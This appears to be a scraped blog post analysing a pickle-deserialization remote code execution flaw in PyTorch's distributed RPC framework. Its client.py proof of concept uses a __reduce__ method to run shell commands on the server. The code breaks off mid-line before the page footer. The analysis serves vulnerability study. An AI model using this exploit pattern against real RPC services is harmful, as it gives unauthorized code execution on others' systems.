Analysis of PyTorch library RPC framework deserialization RCE vulnerability (CVE

0 21
IntroductionThis analyzes the cause of the arbitrary code execution vulnerabilit...

Introduction

This analyzes the cause of the arbitrary code execution vulnerability caused by pickle deserialization in the PyTorch distributed RPC framework

Environment setup and reproduction

  1. Create a virtual environment using conda

    Analysis of PyTorch library RPC framework deserialization RCE vulnerability (CVE

    image-20241105102706402.png

  2. Install PyTorch version 2.4.1 using pip

    image-20241105102740281.png

  3. Create server.py and client.py separately

    server.py creates a distributed RPC service that can handle remote procedure call requests from clients

    # server.py
    import torch
    import torch.distributed.rpc as rpc
    
    def run_server():
        # Initialize server-side RPC
        rpc.init_rpc("server", rank=0, world_size=2)
    
        # Wait for the client's remote call
        rpc.shutdown()
    
    if __name__ == "__main__":
        run_server()
    

    image-20241105102840555.png

    client.py initiated RPC communication and defined a simple neural network modelMyModelwhich includes code that will be triggered at the end of deserialization__reduce__A function, and there is no filtering for this method, thus triggering the execution of malicious code

    # client.py
    import torch
    import torch.distributed.rpc as rpc
    from torch.distributed.nn.api.remote_module import RemoteModule
    import torch.nn as nn
    
    # Define a simple neural network model MyModel
    class MyModel(nn.Module):
        def __init__(self):
            super(MyModel, self).__init__()
            # A simple linear layer with input dimension 2 and output dimension 2
            self.fc = nn.Linear(2, 2)
    
        # Define the forward method
        def __reduce__(self):
            return (__import__('os').system, ("id;ls",))
    
    def run_client():
        # Initialize client-side RPC
        rpc.init_rpc("client", rank=1, world_size=2)
    
        # Create a remote module to run the model on the server side
        remote_model = RemoteModule(
            "server",  # Serve
你可能想看:
最后修改时间:
admin
上一篇 2025年03月27日 00:32
下一篇 2025年03月27日 00:55

评论已关闭